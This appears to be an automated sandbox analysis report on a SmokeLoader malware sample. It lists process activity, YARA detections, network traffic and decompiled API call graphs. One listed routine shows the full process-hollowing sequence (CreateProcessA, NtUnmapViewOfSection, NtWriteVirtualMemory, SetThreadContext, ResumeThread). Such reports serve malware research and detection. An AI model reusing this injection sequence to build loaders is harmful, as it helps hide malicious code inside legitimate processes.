                    Jun 26, 2022 09:45:40.967025042 CEST1413OUTData Raw: 10 87 87 99 1e f1 a5 c6 ba 3f 0e 31 76 be e4 8d 43 13 af 37 d5 45 18 99 ca 9a dd 83 fb a0 e4 83 1e b1 5b a0 1d 18 b8 e0 9e ae f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 45 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1c bb dc 31
                    Data Ascii: ?1vC7E[wmEu$f]d1(D4p+AJ3GKb=iozFP|0Wi<4I-:vA:4XJ'9iR 0omai!JRAKb#tOQva>aR+dR.
                    Jun 26, 2022 09:45:41.516522884 CEST3953INHTTP/1.1 200 OK
                    Server: nginx/1.20.1
                    Date: Sun, 26 Jun 2022 07:45:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: fYour IP blocked0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:09:44:39
                    Start date:26/06/2022
                    Path:C:\Users\user\Desktop\p3jNeWT0GE.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:1
                    Start time:09:44:44
                    Start date:26/06/2022
                    Path:C:\Users\user\Desktop\p3jNeWT0GE.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\p3jNeWT0GE.exe"
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.442558438.0000000001E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.442516398.0000000001E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:4
                    Start time:09:44:52
                    Start date:26/06/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff631f70000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.415791287.0000000002681000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                    Reputation:high

                    Target ID:12
                    Start time:09:45:40
                    Start date:26/06/2022
                    Path:C:\Users\user\AppData\Roaming\hdgaecu
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\hdgaecu
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:13
                    Start time:09:45:43
                    Start date:26/06/2022
                    Path:C:\Users\user\AppData\Roaming\hdgaecu
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\hdgaecu
                    Imagebase:0x400000
                    File size:293376 bytes
                    MD5 hash:25B54F50600604A53E80163B9049421E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.501978878.0000000002051000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.501732921.00000000004B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Reset < >

                      Execution Graph

                      Execution Coverage:17.1%
                      Dynamic/Decrypted Code Coverage:8.6%
                      Signature Coverage:22.5%
                      Total number of Nodes:302
                      Total number of Limit Nodes:13
                      execution_graph 1672 40eec0 1675 41c570 1672->1675 1674 40eeca 1676 41c5b1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1675->1676 1677 41c592 1675->1677 1679 41c613 1676->1679 1677->1676 1678 41c59e 1677->1678 1678->1674 1679->1678 1876 40dc80 1877 40dc8b 1876->1877 1879 40dc9b 1876->1879 1878 40d690 __invoke_watson 10 API calls 1877->1878 1877->1879 1878->1879 1756 416cc0 TlsGetValue 1757 416cdb 1756->1757 1758 416cfd 1756->1758 1761 416c10 TlsGetValue 1757->1761 1762 416c4e 1761->1762 1763 416c2f 1761->1763 1765 416bc0 __crt_wait_module_handle 3 API calls 1762->1765 1768 416c7f TlsSetValue 1762->1768 1763->1762 1764 416c38 TlsGetValue 1763->1764 1764->1762 1766 416c61 1765->1766 1767 416c6d GetProcAddress 1766->1767 1766->1768 1767->1768 1768->1758 1880 417400 1883 41743a 1880->1883 1884 40f170 1883->1884 1885 40f196 1884->1885 1894 419130 1885->1894 1887 40f28e 1897 418800 1887->1897 1888 40f1a5 _memset 1888->1887 1890 40f254 SetUnhandledExceptionFilter UnhandledExceptionFilter 1888->1890 1890->1887 1892 411cf0 __invoke_watson 5 API calls 1893 40f29f 1892->1893 1895 416c10 __encode_pointer 6 API calls 1894->1895 1896 419140 1895->1896 1896->1888 1900 4189f0 1897->1900 1901 418a27 _doexit 1900->1901 1903 416c10 __encode_pointer 6 API calls 1901->1903 1911 418ada __initterm 1901->1911 1905 418a63 1903->1905 1908 416c10 __encode_pointer 6 API calls 1905->1908 1905->1911 1906 40f295 1906->1892 1914 418a7f 1908->1914 1915 418ba8 1911->1915 1912 416bf0 7 API calls ___crtMessageBoxW 1912->1914 1913 416c10 6 API calls __encode_pointer 1913->1914 1914->1911 1914->1912 1914->1913 1916 418ba6 1915->1916 1917 418bae 1915->1917 1916->1906 1919 418c70 1916->1919 1918 418c70 _doexit LeaveCriticalSection 1917->1918 1918->1916 1925 4124f0 LeaveCriticalSection 1919->1925 1921 418bcb 1922 418c30 1921->1922 1923 418bf0 1922->1923 1924 418c3e ExitProcess 1923->1924 1925->1921 2017 4114a0 2018 4114b3 __CrtIsValidHeapPointer 2017->2018 2022 4114ac ___sbh_verify_block 2017->2022 2019 411520 HeapValidate 2018->2019 2020 4114d7 ___sbh_find_block 2018->2020 2018->2022 2019->2022 2021 411506 HeapValidate 2020->2021 2020->2022 2021->2022 1722 c20000 1725 c20630 1722->1725 1724 c20005 1726 c2064c 1725->1726 1728 c21577 1726->1728 1731 c205b0 1728->1731 1734 c205dc 1731->1734 1732 c205e2 GetFileAttributesA 1732->1734 1733 c2061e 1734->1732 1734->1733 1736 c20420 1734->1736 1737 c204f3 1736->1737 1738 c204fa 1737->1738 1739 c204ff CreateWindowExA 1737->1739 1738->1734 1739->1738 1740 c20540 PostMessageA 1739->1740 1741 c2055f 1740->1741 1741->1738 1743 c20110 VirtualAlloc GetModuleFileNameA 1741->1743 1744 c20414 1743->1744 1745 c2017d CreateProcessA 1743->1745 1744->1741 1745->1744 1747 c2025f VirtualFree VirtualAlloc GetThreadContext 1745->1747 1747->1744 1748 c202a9 ReadProcessMemory 1747->1748 1749 c202e5 VirtualAllocEx NtWriteVirtualMemory 1748->1749 1750 c202d5 NtUnmapViewOfSection 1748->1750 1751 c2033b 1749->1751 1750->1749 1752 c20350 NtWriteVirtualMemory 1751->1752 1753 c2039d WriteProcessMemory SetThreadContext ResumeThread 1751->1753 1752->1751 1754 c203fb ExitProcess 1753->1754 1769 424e40 1771 424e4e 1769->1771 1770 424e94 1782 40d620 1770->1782 1771->1770 1774 424ec4 _memset 1771->1774 1773 424f59 1775 40d620 __invalid_parameter 16 API calls 1773->1775 1774->1773 1776 424f89 _memset 1774->1776 1777 424eb7 _memset 1775->1777 1778 425064 1776->1778 1779 425094 _memset 1776->1779 1780 40d620 __invalid_parameter 16 API calls 1778->1780 1779->1777 1781 40d620 __invalid_parameter 16 API calls 1779->1781 1780->1777 1781->1777 1783 416c10 __encode_pointer 6 API calls 1782->1783 1784 40d637 __invoke_watson 1783->1784 1786 40d643 1784->1786 1787 40d690 1784->1787 1786->1777 1794 40ee40 1787->1794 1789 40d6bf IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1790 40d7b9 GetCurrentProcess TerminateProcess 1789->1790 1791 40d7a9 __invoke_watson 1789->1791 1796 411cf0 1790->1796 1791->1790 1793 40d7d5 1793->1786 1795 40ee4c __VEC_memzero 1794->1795 1795->1789 1797 411cf8 1796->1797 1798 411cfa IsDebuggerPresent 1796->1798 1797->1793 1804 417550 1798->1804 1801 42154f SetUnhandledExceptionFilter UnhandledExceptionFilter 1802 421578 GetCurrentProcess TerminateProcess 1801->1802 1803 42156e __invoke_watson 1801->1803 1802->1793 1803->1802 1804->1801 2023 427c20 2024 427c2e 2023->2024 2025 427c8d 2024->2025 2028 427cbd _memset 2024->2028 2030 427c3a _memset 2024->2030 2026 40d620 __invalid_parameter 16 API calls 2025->2026 2026->2030 2027 427db4 2029 40d620 __invalid_parameter 16 API calls 2027->2029 2028->2027 2028->2030 2031 427de4 _memset _strncpy_s 2028->2031 2029->2030 2031->2030 2032 40d620 __invalid_parameter 16 API calls 2031->2032 2032->2030 2033 421620 2034 421632 2033->2034 2036 421640 @_EH4_CallFilterFunc@8 2033->2036 2035 411cf0 __invoke_watson 5 API calls 2034->2035 2035->2036 1926 417c05 1929 4124f0 LeaveCriticalSection 1926->1929 1928 417c0c 1929->1928 1873 417d6f 1874 417d80 1873->1874 1875 417d75 InterlockedDecrement 1873->1875 1875->1874 1805 40dc50 1806 40dc5b 1805->1806 1807 40dc5d 1805->1807 1808 40d690 __invoke_watson 10 API calls 1807->1808 1808->1806 1680 41d6d0 HeapCreate 1681 41d6fe __heap_init 1680->1681 1682 41d6fa 1680->1682 1681->1682 1683 41d711 1681->1683 1687 41fa50 HeapAlloc 1683->1687 1686 41d722 HeapDestroy 1686->1682 1688 41d71b 1687->1688 1688->1682 1688->1686 1689 418c90 1696 416bf0 1689->1696 1691 418c9b __initp_misc_winsig __init_pointers 1699 4173e0 1691->1699 1697 416b20 __encode_pointer 7 API calls 1696->1697 1698 416bfc 1697->1698 1698->1691 1700 416b20 __encode_pointer 7 API calls 1699->1700 1701 4173ef 1700->1701 1702 416b20 TlsGetValue 1701->1702 1703 416b67 1702->1703 1704 416b3f 1702->1704 1714 416bc0 GetModuleHandleW 1703->1714 1704->1703 1706 416b48 TlsGetValue 1704->1706 1708 416b5e 1706->1708 1708->1703 1711 416b91 1708->1711 1709 416b7d GetProcAddress 1710 416b8f 1709->1710 1710->1711 1712 416ba3 RtlEncodePointer 1711->1712 1713 416bad 1711->1713 1712->1713 1715 416b71 1714->1715 1716 416bde 1714->1716 1715->1709 1715->1710 1718 4186e0 1716->1718 1719 4186f6 1718->1719 1720 418728 1719->1720 1721 4186fc Sleep GetModuleHandleW 1719->1721 1720->1715 1721->1719 1721->1720 1809 41f850 1810 41f894 1809->1810 1820 41f88f __free_base 1809->1820 1811 41f92c HeapFree 1810->1811 1813 41f8a1 ___sbh_find_block 1810->1813 1812 41f947 GetLastError 1811->1812 1811->1820 1812->1820 1816 41f8d4 1813->1816 1821 41fb80 1813->1821 1828 41f8e5 1816->1828 1818 41f8f6 HeapFree 1819 41f912 GetLastError 1818->1819 1818->1820 1819->1820 1823 41fbd8 1821->1823 1825 41fbdd 1821->1825 1822 41ffe3 VirtualFree 1824 420070 1822->1824 1823->1816 1824->1823 1826 420094 VirtualFree HeapFree 1824->1826 1825->1822 1825->1823 1831 412bb0 1826->1831 1835 4124f0 LeaveCriticalSection 1828->1835 1830 41f8e3 1830->1818 1830->1820 1832 412bc8 1831->1832 1833 412bf7 1832->1833 1834 412bef __VEC_memcpy 1832->1834 1833->1823 1834->1833 1835->1830 1846 4171d0 1847 417212 1846->1847 1851 417336 1846->1851 1848 417305 InterlockedDecrement 1847->1848 1849 417313 1847->1849 1848->1849 1852 417338 1849->1852 1855 4124f0 LeaveCriticalSection 1852->1855 1854 41733f 1854->1851 1855->1854 1930 412210 1931 412228 1930->1931 1932 41227f 1931->1932 1934 421700 InitializeCriticalSectionAndSpinCount 1931->1934 1935 421791 1934->1935 1935->1931 1936 412510 1944 4126d0 1936->1944 1938 4125d6 __except_handler4 1939 4126d0 _ValidateLocalCookies 5 API calls 1938->1939 1940 4126bb 1938->1940 1939->1940 1942 412551 __IsNonwritableInCurrentImage __except_handler4 1942->1938 1943 4126d0 _ValidateLocalCookies 5 API calls 1942->1943 1950 4216b2 RtlUnwind 1942->1950 1943->1942 1945 4126e0 1944->1945 1946 412705 1944->1946 1947 411cf0 __invoke_watson 5 API calls 1945->1947 1948 411cf0 __invoke_watson 5 API calls 1946->1948 1947->1946 1949 41272b 1948->1949 1949->1942 1951 4216c7 1950->1951 1951->1942 1952 411d90 1953 411d9e 1952->1953 1954 411de4 1953->1954 1955 411e14 _memset 1953->1955 1956 40d620 __invalid_parameter 16 API calls 1954->1956 1957 411ea9 1955->1957 1960 411ed9 _memset 1955->1960 1959 411e07 _memset 1956->1959 1958 40d620 __invalid_parameter 16 API calls 1957->1958 1958->1959 1960->1959 1961 40d620 __invalid_parameter 16 API calls 1960->1961 1961->1959 1856 426650 1858 42665e 1856->1858 1857 4266a4 1859 40d620 __invalid_parameter 16 API calls 1857->1859 1858->1857 1860 4266d4 _memset 1858->1860 1865 4266c7 _memset 1859->1865 1861 42676d 1860->1861 1863 42679d _memset 1860->1863 1862 40d620 __invalid_parameter 16 API calls 1861->1862 1862->1865 1864 42687d 1863->1864 1867 4268ad _memset 1863->1867 1866 40d620 __invalid_parameter 16 API calls 1864->1866 1866->1865 1867->1865 1868 40d620 __invalid_parameter 16 API calls 1867->1868 1868->1865 1869 429fd0 1870 429feb 1869->1870 1871 40d620 __invalid_parameter 16 API calls 1870->1871 1872 429ff9 1870->1872 1871->1872 1962 424e10 1965 424a90 1962->1965 1964 424e30 1966 424aa5 1965->1966 1967 424afa 1966->1967 1969 424b2d _memset 1966->1969 1968 40d620 __invalid_parameter 16 API calls 1967->1968 1976 424b20 _memset _LocaleUpdate::~_LocaleUpdate 1968->1976 1970 424c3c __mbstowcs_s_l 1969->1970 1971 424bfc 1969->1971 1977 424740 1970->1977 1973 40d620 __invalid_parameter 16 API calls 1971->1973 1973->1976 1974 424c56 _memset 1975 40d620 __invalid_parameter 16 API calls 1974->1975 1974->1976 1975->1976 1976->1964 1978 424755 1977->1978 1979 4247da 1978->1979 1980 4247ac 1978->1980 1989 42475b _LocaleUpdate::~_LocaleUpdate _strlen 1978->1989 1982 4247f0 __mbstowcs_s_l 1979->1982 1983 4249f4 __mbstowcs_s_l 1979->1983 1981 40d620 __invalid_parameter 16 API calls 1980->1981 1981->1989 1984 424882 MultiByteToWideChar 1982->1984 1982->1989 1985 424a36 MultiByteToWideChar 1983->1985 1983->1989 1986 4248b0 GetLastError 1984->1986 1984->1989 1985->1989 1988 4248e5 __mbstowcs_s_l __isleadbyte_l 1986->1988 1986->1989 1987 42499a MultiByteToWideChar 1987->1989 1988->1987 1988->1989 1989->1974 1990 42a090 1991 416bf0 ___crtMessageBoxW 7 API calls 1990->1991 1992 42a0a4 1991->1992 1993 42a0c9 LoadLibraryA 1992->1993 2016 42a18f 1992->2016 1994 42a0e4 GetProcAddress 1993->1994 1995 42a0dd 1993->1995 1994->1995 1996 42a103 1994->1996 1999 416b20 __encode_pointer 7 API calls 1996->1999 1997 42a238 2006 416c10 __encode_pointer 6 API calls 1997->2006 2010 42a214 1997->2010 1998 416c10 __encode_pointer 6 API calls 2002 42a1b8 1998->2002 2003 42a10c GetProcAddress 1999->2003 2000 416c10 __encode_pointer 6 API calls 2000->1995 2001 416c10 __encode_pointer 6 API calls 2001->1997 2004 416c10 __encode_pointer 6 API calls 2002->2004 2005 416b20 __encode_pointer 7 API calls 2003->2005 2011 42a1ca 2004->2011 2007 42a129 GetProcAddress 2005->2007 2006->2010 2008 416b20 __encode_pointer 7 API calls 2007->2008 2009 42a146 GetProcAddress 2008->2009 2012 416b20 __encode_pointer 7 API calls 2009->2012 2010->2000 2011->1997 2011->2001 2011->2010 2013 42a169 2012->2013 2014 42a17a GetProcAddress 2013->2014 2013->2016 2015 416b20 __encode_pointer 7 API calls 2014->2015 2015->2016 2016->1998 2016->2011

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00C20156
                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00C2016C
                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00C20255
                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C20270
                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C20283
                      • GetThreadContext.KERNELBASE(00000000,?), ref: 00C2029F
                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C202C8
                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00C202E3
                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00C20304
                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00C2032A
                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00C20399
                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C203BF
                      • SetThreadContext.KERNELBASE(00000000,?), ref: 00C203E1
                      • ResumeThread.KERNELBASE(00000000), ref: 00C203ED
                      • ExitProcess.KERNEL32(00000000), ref: 00C20412
                      Memory Dump Source
                      • Source File: 00000000.00000002.361789430.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_c20000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                      • String ID:
                      • API String ID: 2875986403-0
                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction ID: 06bfb7425c0a9c0434de567a4cb7c0ba4bb84a37d75942beeb9f494139e8c643
                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction Fuzzy Hash: D0B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 15 c20420-c204f8 17 c204fa 15->17 18 c204ff-c2053c CreateWindowExA 15->18 19 c205aa-c205ad 17->19 20 c20540-c20558 PostMessageA 18->20 21 c2053e 18->21 22 c2055f-c20563 20->22 21->19 22->19 23 c20565-c20579 22->23 23->19 25 c2057b-c20582 23->25 26 c20584-c20588 25->26 27 c205a8 25->27 26->27 28 c2058a-c20591 26->28 27->22 28->27 29 c20593-c20597 call c20110 28->29 31 c2059c-c205a5 29->31 31->27
                      APIs
                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00C20533
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.361789430.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_c20000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                      • API String ID: 716092398-2341455598
                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction ID: 1a58cf7b8d1f5c789da168c4b3f0847dba151b8a8b493a07c3609e6fd9ea740c
                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction Fuzzy Hash: F2512B70D08388DEEB11CBD8D849BDDBFB2AF11708F244059E5447F286C3BA5658CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 32 c205b0-c205d5 33 c205dc-c205e0 32->33 34 c205e2-c205f5 GetFileAttributesA 33->34 35 c2061e-c20621 33->35 36 c20613-c2061c 34->36 37 c205f7-c205fe 34->37 36->33 37->36 38 c20600-c2060b call c20420 37->38 40 c20610 38->40 40->36
                      APIs
                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00C205EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.361789430.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_c20000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID: apfHQ$o
                      • API String ID: 3188754299-2999369273
                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction ID: 5169765d158abf9b6663308e9e9aa7144def4d63c61e566b44f13208124d59b1
                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction Fuzzy Hash: 0A011E70C0425CEEDF10DB98D5583AEBFB5AF41308F248099D8192B342D7B69B58CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 41 416bf0-416bf7 call 416b20 43 416bfc-416c00 41->43
                      C-Code - Quality: 100%
                      			E00416BF0() {
                      				void* _t1;
                      
                      				_t1 = E00416B20(0); // executed
                      				return _t1;
                      			}




                      0x00416bf7
                      0x00416c00

                      APIs
                      • __encode_pointer.LIBCMTD ref: 00416BF7
                        • Part of subcall function 00416B20: TlsGetValue.KERNEL32(00000001), ref: 00416B35
                        • Part of subcall function 00416B20: TlsGetValue.KERNEL32(00000001,00000001), ref: 00416B56
                        • Part of subcall function 00416B20: __crt_wait_module_handle.LIBCMTD ref: 00416B6C
                        • Part of subcall function 00416B20: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B86
                        • Part of subcall function 00416B20: RtlEncodePointer.NTDLL(?), ref: 00416BA7
                      Memory Dump Source
                      • Source File: 00000000.00000002.361505469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.361501884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361550403.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361575239.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361775443.0000000000B32000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361783200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                      • String ID:
                      • API String ID: 568403282-0
                      • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                      • Instruction ID: 65bb6b378d85e8518305c1cfd9c96ea0574de98a9b50e01811e92182e451f754
                      • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                      • Instruction Fuzzy Hash: BEA0127244820833D00020833803B023A4E43C0739F090025F50C051426842F450C097
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 44 40eec0-40eec5 call 41c570 46 40eeca call 40eee0 44->46
                      C-Code - Quality: 100%
                      			_entry_() {
                      				void* _t3;
                      				void* _t4;
                      
                      				E0041C570(); // executed
                      				return L0040EEE0(_t3, _t4);
                      			}





                      0x0040eec5
                      0x0040eed0

                      APIs
                      • ___security_init_cookie.LIBCMTD ref: 0040EEC5
                      Memory Dump Source
                      • Source File: 00000000.00000002.361505469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.361501884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361550403.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361575239.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361775443.0000000000B32000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361783200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ___security_init_cookie
                      • String ID:
                      • API String ID: 3657697845-0
                      • Opcode ID: f14c17b3d763d89e0a4906a93386d478d5a538d69fef357ced05a81658306132
                      • Instruction ID: 26670b095125c4fe2053c471a7d89219e35f1bbd53d15d2dffcbc620bce8bd19
                      • Opcode Fuzzy Hash: f14c17b3d763d89e0a4906a93386d478d5a538d69fef357ced05a81658306132
                      • Instruction Fuzzy Hash: 3DA002654C475C264150B3A7484794A758F88C17587D5082A7558122432CACB89140EE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 85%
                      			E00411CF0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                      				intOrPtr _v0;
                      				void* _v804;
                      				intOrPtr _v808;
                      				intOrPtr _v812;
                      				intOrPtr _t6;
                      				intOrPtr _t11;
                      				long _t15;
                      				intOrPtr _t19;
                      				intOrPtr _t20;
                      				intOrPtr _t21;
                      				intOrPtr _t22;
                      				intOrPtr _t23;
                      				intOrPtr _t24;
                      				intOrPtr _t25;
                      				intOrPtr* _t29;
                      				void* _t34;
                      
                      				_t25 = __esi;
                      				_t24 = __edi;
                      				_t22 = __edx;
                      				_t20 = __ecx;
                      				_t19 = __ebx;
                      				_t6 = __eax;
                      				_t34 = _t20 -  *0x44387c; // 0x78063f55
                      				if(_t34 == 0) {
                      					asm("repe ret");
                      				}
                      				 *0xb328c8 = _t6;
                      				 *0xb328c4 = _t20;
                      				 *0xb328c0 = _t22;
                      				 *0xb328bc = _t19;
                      				 *0xb328b8 = _t25;
                      				 *0xb328b4 = _t24;
                      				 *0xb328e0 = ss;
                      				 *0xb328d4 = cs;
                      				 *0xb328b0 = ds;
                      				 *0xb328ac = es;
                      				 *0xb328a8 = fs;
                      				 *0xb328a4 = gs;
                      				asm("pushfd");
                      				_pop( *0xb328d8);
                      				 *0xb328cc =  *_t29;
                      				 *0xb328d0 = _v0;
                      				 *0xb328dc =  &_a4;
                      				 *0xb32818 = 0x10001;
                      				_t11 =  *0xb328d0; // 0x0
                      				 *0xb327cc = _t11;
                      				 *0xb327c0 = 0xc0000409;
                      				 *0xb327c4 = 1;
                      				_t21 =  *0x44387c; // 0x78063f55
                      				_v812 = _t21;
                      				_t23 =  *0x443880; // 0x87f9c0aa
                      				_v808 = _t23;
                      				 *0xb32810 = IsDebuggerPresent();
                      				_push(1);
                      				E00417550(_t12);
                      				SetUnhandledExceptionFilter(0);
                      				_t15 = UnhandledExceptionFilter(0x40863c);
                      				if( *0xb32810 == 0) {
                      					_push(1);
                      					E00417550(_t15);
                      				}
                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                      			}



















                      0x00411cf0
                      0x00411cf0
                      0x00411cf0
                      0x00411cf0
                      0x00411cf0
                      0x00411cf0
                      0x00411cf0
                      0x00411cf6
                      0x00411cf8
                      0x00411cf8
                      0x0042148b
                      0x00421490
                      0x00421496
                      0x0042149c
                      0x004214a2
                      0x004214a8
                      0x004214ae
                      0x004214b5
                      0x004214bc
                      0x004214c3
                      0x004214ca
                      0x004214d1
                      0x004214d8
                      0x004214d9
                      0x004214e2
                      0x004214ea
                      0x004214f2
                      0x004214fd
                      0x00421507
                      0x0042150c
                      0x00421511
                      0x0042151b
                      0x00421525
                      0x0042152b
                      0x00421531
                      0x00421537
                      0x00421543
                      0x00421548
                      0x0042154a
                      0x00421554
                      0x0042155f
                      0x0042156c
                      0x0042156e
                      0x00421570
                      0x00421575
                      0x0042158d

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0042153D
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421554
                      • UnhandledExceptionFilter.KERNEL32(0040863C), ref: 0042155F
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0042157D
                      • TerminateProcess.KERNEL32(00000000), ref: 00421584
                      Memory Dump Source
